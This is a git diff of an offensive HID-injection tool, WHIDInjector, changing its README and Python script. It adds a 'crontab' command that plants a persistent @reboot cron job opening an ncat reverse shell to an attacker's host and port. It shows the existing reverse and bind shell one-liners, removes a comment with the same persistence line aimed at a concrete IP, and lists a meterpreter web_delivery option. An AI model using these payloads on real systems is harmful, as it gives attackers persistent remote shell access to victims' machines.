diff --git a/README.md b/README.md index 82e943d..36d79d9 100644 --- a/README.md +++ b/README.md @@ -69,11 +69,12 @@ Sending payload to http://192.168.1.1/runlivepayload | Commands | Description | | :------------- | :------------- | | bind | initiate a bind shell on results.port | -| reverse | initiate a reverse shell on results.host and results.port| +| reverse | initiate a reverse shell on results.host and results.port | +| crontab | set up a crontab reverse shell on results.host and results.port | | meterpreter [https://YOUR_SERVER_IP:4646/posh-payload] | use exploit/multi/script/web_delivery with a posh-payload | -| send some text | send the specified text | -| h | help | -| q | quit | +| send some text | send the specified text | +| h | help | +| q | quit | You can change the options with `SET option_name option_value` ```c diff --git a/WHIDInjector.py b/WHIDInjector.py index f2f35b2..2d57028 100644 --- a/WHIDInjector.py +++ b/WHIDInjector.py @@ -77,6 +77,10 @@ if __name__ == "__main__": elif "reverse" == user_input : user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port) + # Crontab Linux + elif "crontab" == user_input : + user_input = "bash -c '(crontab -l ; echo \"@reboot sleep 200 && ncat %s %s -e /bin/bash\")|crontab 2> /dev/null'" % (results.host, results.port) + # Bind Shell Linux elif "bind" == user_input: user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port) @@ -138,13 +142,6 @@ if __name__ == "__main__": """ export un binary with mapping FR: 2.7.51-ESP_Code.ino.french.bin -empire bug -refactor: - -crontab: -(crontab -l ; echo "@reboot sleep 200 && ncat 92.222.81.2 4242 -e /bin/bash")|crontab 2> /dev/null - - TODO change_ssid_name TODO change_ssid_pass TODO update_firmware